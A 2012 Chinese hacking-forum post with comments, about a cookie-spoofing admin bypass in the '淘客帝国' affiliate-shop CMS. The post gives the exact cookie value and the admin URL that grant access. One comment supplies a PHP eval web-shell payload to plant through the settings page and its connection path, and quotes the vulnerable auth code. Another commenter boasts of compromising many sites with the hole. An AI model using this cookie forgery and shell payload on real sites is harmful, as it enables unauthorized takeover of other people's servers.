淘客帝国最新免费版后台cookie欺骗

2012-11-26 22:57:35 24 孤心 5301

主题:淘客帝国最新免费版后台cookie欺骗
作者:孤心
偶然发现的淘客帝国免费版的后台可以cookie欺骗

工具：老兵的cookie'欺骗工具
关键字：分类- 商城- 品牌- 女人- 男人- 美容- 鞋包- 数码- 居家- 食品

首先打开工具把cookie改为 COOKIEadminuser=admin; DedeUserID=1; PHPSESSID=11111 ，然后再工具的地址栏那里输入网站的后台（默认后台/admin）等页面全部出来后再在后台目录后加上manage.php 跳转就可以进入后台了，进入后台后怎么样拿shell就简单了，这里就不说了..

漏洞已跟官网客服报了

类别 Web安全

关于作者

孤心20篇文章236篇回复

孤心

评论24次

要评论？请先登录或注册

24楼

wyfiwqc
2012-12-8 16:38

好像挺低级的一个漏洞

回复|@ta|踩(0)|顶(0)
23楼

乐平
2012-12-7 14:30

session不作验证....

回复|@ta|踩(0)|顶(0)
22楼

maxs98
2012-12-4 17:53

这个怎么玩的？代码神马意思？

回复|@ta|踩(0)|顶(0)
21楼

尿不湿—黑鸟
2012-12-4 00:59

楼上说的的确啊

回复|@ta|踩(0)|顶(0)
20楼

samurai
2012-12-1 17:04

有奇葩程序员才有做安全的人存在。

回复|@ta|踩(0)|顶(0)
19楼

点点123
2012-11-29 20:13

学xi了试试去

回复|@ta|踩(0)|顶(0)
18楼

guhuisec
2012-11-29 18:19

学xi拉，膜拜高手

回复|@ta|踩(0)|顶(0)

17楼

anlfi

2012-11-29 10:31

少年给你个玩具玩你就懂了

------------------------------test2if.php <?php if( ($_GET['A']!="") && ($_GET['B']!="") ){               echo("Su");                                  }else{                 echo("Fe");                 exit;         }         echo("_login_main"); ?>  --------------------------------------------------test1if.php <?php if( ($_GET['A']!="") || ($_GET['B']!="") ){               echo("Su");         }else{                 echo("Fe");                 exit;         }                         echo("_login_main");          ?>

回复|@ta|踩(0)|顶(0)

16楼

染血の雪
2012-11-28 19:33

我也是这么认为的

回复|@ta|踩(0)|顶(0)
15楼

xiaoxiaoabc
2012-11-28 17:43

路过，打酱油，可以么。

回复|@ta|踩(0)|顶(0)
14楼

guhuisec
2012-11-28 12:44

还是用session吧！！

回复|@ta|踩(0)|顶(0)
13楼

Anonymous
2012-11-27 21:38

之前X 淘客站的时候用这洞日过一批。。。

回复|@ta|踩(0)|顶(0)
12楼

weijuma
2012-11-27 20:36

不知道是我的问题还是啥... 测试了好几个都没成功

回复|@ta|踩(0)|顶(0)
11楼

奔跑的馒头
2012-11-27 16:45

试试去。

回复|@ta|踩(0)|顶(0)
10楼

ty4z2008
2012-11-27 14:17

又是一个条件问题

回复|@ta|踩(0)|顶(0)
9楼

妖妖灵
2012-11-27 11:51

回复|@ta|踩(0)|顶(0)
8楼

anlfi
2012-11-27 11:11

学雷锋一定没好下场无节操的人太多了妹子还会给你送好人卡你卖萌人家就黑你

回复|@ta|踩(0)|顶(0)
7楼

package
2012-11-27 11:10

这个程序员真是奇葩啊

回复|@ta|踩(0)|顶(0)
6楼
anlfi
2012-11-27 10:52
getshell 简单 xi统配置 {${@eval($_POST['anlfi'])}} 一句话连接地址/data/configdata.php 顺便补一下代码 ===================|The End}
##admin目录下php 部验证## --------------------main.php <?php require_once '../include/adminfunction.php'; checkadmin(); ---------------------/include/sysfunction.php ##### function checkadmin(){ global $COOKIEadminuser; global $sitetitleurl; //判断 if( (isset($_COOKIE['COOKIEadminuser']) && $_COOKIE['COOKIEadminuser']!="") || (isset($_SESSION['adminuser']) && $_SESSION['adminuser']!="") ){ }else{ echo("<script language='JavaScript'>top.location.href='".$sitetitleurl."';</script>"); exit; } } ##### ----------------------
============^start=======code 一看就懂 $_COOKIE['COOKIEadminuser']!="" 只要不为空就ok //index.php 一看到这里就知道程序员自己催眠了自己登出就把adminuser 清空 .........COOKIEadminuser是干神马的？ /admin/index.php 是不会通过验证但是如果访问/admin/manage.php 的话一样ok 也就lz所谓的偶然发现了 COOKIEadminuser 并没有空 if($action=="loginout"){ $_SESSION['adminuser'] = ""; SetCookie("adminuser", ""); redirect_to($sitetitleurl); } 其实所有审计过程是倒序解说是正序乌云才不会理你呢早上好O(∩_∩)O哈！
回复|@ta|踩(0)|顶(0)
5楼

love403
2012-11-27 09:53

确实好用

回复|@ta|踩(0)|顶(0)